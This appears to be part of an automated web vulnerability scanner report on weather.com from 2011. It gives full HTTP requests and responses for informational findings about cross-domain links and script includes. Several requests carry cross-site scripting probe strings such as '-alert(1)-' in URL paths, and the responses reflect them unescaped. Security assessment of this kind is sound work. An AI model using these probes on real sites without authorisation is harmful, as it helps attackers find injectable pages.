                                       <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW">
                                   </a>
...[SNIP]...
<a
                           href="/outdoors/home-improvement/" from="nav_secondary" >Home Improvement&nbsp;
                           <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW">
                       </a>
...[SNIP]...
<a href="/services/ipad.html" from="nav_secondary">iPad App&nbsp;
                                       <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW">
                                   </a>
...[SNIP]...
<a href="/tv/programs/ywt.html" from="nav_spotlight">Exclusive Behind-the-Scenes View&nbsp;
                                       <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW">
                                   </a>
...[SNIP]...
<A href="http://www.weather.com/newscenter/nationalforecast/index.html"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_weathernews.jpg" width=100></A>
...[SNIP]...
<A href="http://www.weather.com/activities/travel/vacationplanner/"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_travelplanner.jpg" width=100></A>
...[SNIP]...
<A href="http://www.weather.com/tv/"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_ontv.jpg" width=100></A>
...[SNIP]...
<dd><a href="http://www.theweatherchannelkids.com/" target="_blank">TWC Kids</a></dd> <dd><a href="http://weatherbonk.com/" target="_blank">WeatherBonk</a>
...[SNIP]...
<dd><a title="America's Event And Attraction Search Engine - Festivals, Arts And Crafts, Fairs And Many Other Local Events And Attractions" href="http://www.eventcrazy.com" target="_blank">EventCrazy.com Events</a>
...[SNIP]...
<dd><a href="http://www.webmd.com/allergies/default.htm" target="_blank">WebMD Asthma &amp; Allergy Center</a>
...[SNIP]...
<dd><a href="http://www.godaddy.com/default.aspx?isc=gdweather2" target="_blank">Web Hosting at GoDaddy.com</a>
...[SNIP]...
<dd><a href="http://www.forgetaway.com" target="_blank"><br>
...[SNIP]...
<li><a target="_blank" href="http://twcmediakit.com/" from="footer">Advertising</a>
...[SNIP]...
<li class="twc-last"><a href="http://www.controlyourtv.org/Intro.aspx" target="_blank" from="footer">Parental Controls</a>
...[SNIP]...

4.4. http://www.weather.com/pagelet/bc/56967

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/56967

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pagelet/bc/56967? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Thu, 24 Mar 2011 17:33:43 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:37:54 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x02
X-Cache-Hits: 1
X-Varnish: 1156282709 1156204280
Connection: keep-alive
Content-Length: 4162


<script>
function PopupCenter(pageURL, title,w,h) {
var left = (screen.width/2)-(w/2);
var top = (screen.height/2)-(h/2);
var targetWin = window.open (pageURL, title, 'toolbar=no,
...[SNIP]...
<li>
   <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com    %2FTheWeatherChannel&amp;layout=button_count&amp;show_faces=true&amp;width=92&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no"    frameborder="0" ALLOWTRANSPARENCY="true"></iframe>
...[SNIP]...

4.5. http://www.weather.com/pagelet/bc/59233

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/59233

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pagelet/bc/59233? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/services/desktop.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Thu, 24 Mar 2011 17:37:47 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:47 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x01
X-Varnish: 2184649200
Connection: keep-alive
Content-Length: 4179


<script>
function PopupCenter(pageURL, title,w,h) {
var left = (screen.width/2)-(w/2);
var top = (screen.height/2)-(h/2);
var targetWin = window.open (pageURL, title, 'toolbar=no,
...[SNIP]...
<li>
   <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com    %2FTheWeatherChannel&amp;layout=button_count&amp;show_faces=true&amp;width=92&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no"    frameborder="0" ALLOWTRANSPARENCY="true"></iframe>
...[SNIP]...

4.6. http://www.weather.com/pagelet/bc/62264

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/62264

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pagelet/bc/62264?locid=undefined HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Thu, 24 Mar 2011 17:35:20 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:38:37 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x02
X-Varnish: 1096871981
Connection: keep-alive
Content-Length: 4180


                                                   <script>
function PopupCenter(pageURL, title,w,h) {
var left = (screen.width/2)-(w/2);
var top = (screen.height/2)-(h/2);
var targetWin = window.open (pageUR
...[SNIP]...
<li>
   <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com    %2FTheWeatherChannel&amp;layout=button_count&amp;show_faces=true&amp;width=92&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no"    frameborder="0" ALLOWTRANSPARENCY="true"></iframe>
...[SNIP]...

5. Cross-domain script include
There are 10 instances of this issue:


5.1. http://www.weather.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:28:40 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x01
X-Cache-Hits: 1
X-Varnish: 2366335366 2366335339
Date: Thu, 24 Mar 2011 17:28:17 GMT
Connection: keep-alive
Content-Length: 159636

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssVersion/?">


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...

5.2. http://www.weather.com/activities/driving/rushhour/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /activities/driving/rushhour/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activities/driving/rushhour/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:32:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web1x10
VarnishSet: web
X-Varnish: 1455522174
Vary: Accept-Encoding
Content-Length: 96659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<HTML>
<HEAD>
<TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<
...[SNIP]...
<!-- DFP -->

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"></script>
<script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"></script>
...[SNIP]...
</style>
<script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"></script>
<script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"></script>
...[SNIP]...

5.3. http://www.weather.com/common/a21/makeRequest-2_3.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /common/a21/makeRequest-2_3.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /common/a21/makeRequest-2_3.html?pos=WX_Top300Variable&key=1300987733362 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1300987732569; fv=1; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:28:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web3x03
VarnishSet: web
X-Varnish: 2587929389
Vary: Accept-Encoding
Content-Length: 2503

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>Make a request</title>

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...

5.4. http://www.weather.com/mobile/swap/send_sms_to_phone.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /mobile/swap/send_sms_to_phone.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x13
Expires: Thu, 24 Mar 2011 17:36:18 GMT
Connection: keep-alive
Content-Length: 34038

<HTML>
   <HEAD>
    <TITLE>Wireless Internet</title>
<script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap
...[SNIP]...
<!-- DFP -->

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"></script>
<script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=K06578" CHARSET="ISO-8859-1"></script>
...[SNIP]...

5.5. http://www.weather.com/pagelet/apps/traffic/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /pagelet/apps/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:00 GMT
Server: Apache
Vary: Accept-Encoding
nnCoection: close
SVRNAME: wxii1x04
X-Varnish: 1510914846
Date: Thu, 24 Mar 2011 17:40:00 GMT
Connection: keep-alive
Content-Length: 108234

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
</style>


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...

5.6. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Date: Thu, 24 Mar 2011 17:40:48 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:17 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 2184720384
Connection: keep-alive
Content-Length: 159902

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssVersion/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico?">


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...

5.7. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Date: Thu, 24 Mar 2011 17:40:12 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:40:41 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x04
X-Varnish: 2184711165
Connection: keep-alive
Content-Length: 159890

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssVersion/pagelet8cd82"-alert(1)-"370523ec97/bc/favicon2.ico?">


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


